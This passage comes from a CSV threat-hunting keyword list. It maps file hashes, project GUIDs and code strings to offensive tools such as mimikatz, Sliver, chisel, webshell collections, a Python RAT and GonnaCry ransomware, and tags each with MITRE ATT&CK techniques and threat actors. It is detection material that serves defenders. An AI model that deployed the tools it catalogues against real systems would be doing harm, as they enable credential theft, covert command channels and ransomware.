TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32209" "*a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2*",".{0,1000}a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32211" "*a0fd47aca72b23be5ed3afcf1240130f12a8e8981ea7674ff1ee6e7d34935b3d*",".{0,1000}a0fd47aca72b23be5ed3afcf1240130f12a8e8981ea7674ff1ee6e7d34935b3d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information 
gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32212" "*a0rtega/metame*",".{0,1000}a0rtega\/metame.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","N/A","6","580","88","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z","32214" "*a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd*",".{0,1000}a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","32215" "*a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd*",".{0,1000}a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","32216" "*A11E7DAE-21F2-46A8-991E-D38DEBE1650F*",".{0,1000}A11E7DAE\-21F2\-46A8\-991E\-D38DEBE1650F.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","#GUIDproject","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","32223" "*a11f916dc20d775bd4961ae27388d2ac5a6613a45e58589040aacd8e70042a23*",".{0,1000}a11f916dc20d775bd4961ae27388d2ac5a6613a45e58589040aacd8e70042a23.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32224" "*a1202bb8a90a635f6551b1733c4b777ee6abac7689dad8e7391e3ad01e3a370e*",".{0,1000}a1202bb8a90a635f6551b1733c4b777ee6abac7689dad8e7391e3ad01e3a370e.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","32225" "*a121163840b57e70165172fe625a054fb1988468fb1a51aed45355463fb3cac4*",".{0,1000}a121163840b57e70165172fe625a054fb1988468fb1a51aed45355463fb3cac4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32226" "*a12141ccddd231b9596e3ded58b95835338ff5f5fbc0b9470788e51fe9b4e651*",".{0,1000}a12141ccddd231b9596e3ded58b95835338ff5f5fbc0b9470788e51fe9b4e651.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop 
a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","32227" "*a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb*",".{0,1000}a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32228" "*a127dfa17e403f954441ae42d4bca8d2bdbc2e566e522a2ea75d88722540efae*",".{0,1000}a127dfa17e403f954441ae42d4bca8d2bdbc2e566e522a2ea75d88722540efae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32229" "*a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7*",".{0,1000}a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - 
T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32230" "*a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f*",".{0,1000}a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32232" "*a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f*",".{0,1000}a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - 
T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32233" "*A138FC2A-7BFF-4B3C-94A0-62A8BC01E8C0*",".{0,1000}A138FC2A\-7BFF\-4B3C\-94A0\-62A8BC01E8C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","32236" "*a13985069fc38a1a2d154f9da033a5d6fec33c74f29b301bd283459207bfd4ac*",".{0,1000}a13985069fc38a1a2d154f9da033a5d6fec33c74f29b301bd283459207bfd4ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32237" "*A13BGD = base64.b64decode(A13BGD)*",".{0,1000}A13BGD\s\=\s\sbase64\.b64decode\(A13BGD\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","32238" "*a13f4672fc13262b372d0ab5c186851f6bb2ec1a76a68f1eb3e85ac9478f2c91*",".{0,1000}a13f4672fc13262b372d0ab5c186851f6bb2ec1a76a68f1eb3e85ac9478f2c91.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32239" 
"*a15bb4faba020d217016fde6e231074a*",".{0,1000}a15bb4faba020d217016fde6e231074a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","32241" "*a1632c4ac9e42fa8bd4f5c393bc40cbc32f9dda8c18bf57e91d575df3c47a7d9*",".{0,1000}a1632c4ac9e42fa8bd4f5c393bc40cbc32f9dda8c18bf57e91d575df3c47a7d9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32242" "*a1666ab37da97129746e6efae58c29e4796ad1427d41326061f80f9706ec3083*",".{0,1000}a1666ab37da97129746e6efae58c29e4796ad1427d41326061f80f9706ec3083.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32243" "*a1670329540c5f64b2f6bd9c192d776256616f94622a002152e4e93515341a75*",".{0,1000}a1670329540c5f64b2f6bd9c192d776256616f94622a002152e4e93515341a75.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32244" 
"*a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947*",".{0,1000}a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32245" "*a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1*",".{0,1000}a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32246" "*A17656B2-42D1-42CD-B76D-9B60F637BCB5*",".{0,1000}A17656B2\-42D1\-42CD\-B76D\-9B60F637BCB5.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","#GUIDproject","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","32248" "*a17a13c48d23f7010a1da7f4be455dae938db574ebbd7882de649792f3959df5*",".{0,1000}a17a13c48d23f7010a1da7f4be455dae938db574ebbd7882de649792f3959df5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32250" 
"*a17d3b89f61fdfaa034da9471ede5e346af8f5ef897d792487c2a726a071baae*",".{0,1000}a17d3b89f61fdfaa034da9471ede5e346af8f5ef897d792487c2a726a071baae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32251" "*a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9*",".{0,1000}a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32252" "*a183c4ae65ed9747af2c8d5d84e222df3982482d1f6130df40cab381cd47f0fe*",".{0,1000}a183c4ae65ed9747af2c8d5d84e222df3982482d1f6130df40cab381cd47f0fe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","32253" "*a18a2e9a870deb66397ea527ca071bcc74ebb7789b7aeec4a179ab13a1674a00*",".{0,1000}a18a2e9a870deb66397ea527ca071bcc74ebb7789b7aeec4a179ab13a1674a00.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","32254" 
"*a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51*",".{0,1000}a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","32255" "*a19a1c24514a2b09c592a42fd5e813cdea511507f809a57e31067ab6f1296bf3*",".{0,1000}a19a1c24514a2b09c592a42fd5e813cdea511507f809a57e31067ab6f1296bf3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32257" "*a19ddb663db4b66ea06b8cf9dae66f6988e0a70c07cf9159e1c6abc01c415f95*",".{0,1000}a19ddb663db4b66ea06b8cf9dae66f6988e0a70c07cf9159e1c6abc01c415f95.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","32258" "*a19fbec8a7ecca1ba56daec33727923e722576d5c7fcbc92ff86149ff4f2d425*",".{0,1000}a19fbec8a7ecca1ba56daec33727923e722576d5c7fcbc92ff86149ff4f2d425.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","32259" "*A1A949A4-5CE4-4FCF-A3B9-A2290EA46086*",".{0,1000}A1A949A4\-5CE4\-4FCF\-A3B9\-A2290EA46086.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","#GUIDproject","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","32261" "*a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0*",".{0,1000}a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32263" "*a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5*",".{0,1000}a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32264" "*a1b2d9ea6e99d95f0e69e4aed2008823f52a7bbea2e1e1a102e8ab2fcc370829*",".{0,1000}a1b2d9ea6e99d95f0e69e4aed2008823f52a7bbea2e1e1a102e8ab2fcc370829.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","32265" "*a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d*",".{0,1000}a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","32266" "*a1b8bf87544be53073f60ca03c4e1df5361cc7e54b4d32b30e55ba8e1f38f457*",".{0,1000}a1b8bf87544be53073f60ca03c4e1df5361cc7e54b4d32b30e55ba8e1f38f457.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - 
TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","32267" "*a1bba1fc539fed1fa694c030b340435fe309474debf5e2c599d3d4fd3b972a47*",".{0,1000}a1bba1fc539fed1fa694c030b340435fe309474debf5e2c599d3d4fd3b972a47.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32268" "*a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336*",".{0,1000}a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32270" "*a1c419116396cb01b6dadedbff3b140aa16e49d08c3e09f5da89a057982a5300*",".{0,1000}a1c419116396cb01b6dadedbff3b140aa16e49d08c3e09f5da89a057982a5300.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32272" "*a1ca98f25cf4319995603b9cf1869da4a0a82c1747e01fe4714d1c4b5faaeef8*",".{0,1000}a1ca98f25cf4319995603b9cf1869da4a0a82c1747e01fe4714d1c4b5faaeef8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove 
Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32273" "*a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666*",".{0,1000}a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32275" "*a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d*",".{0,1000}a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32278" "*a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e*",".{0,1000}a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
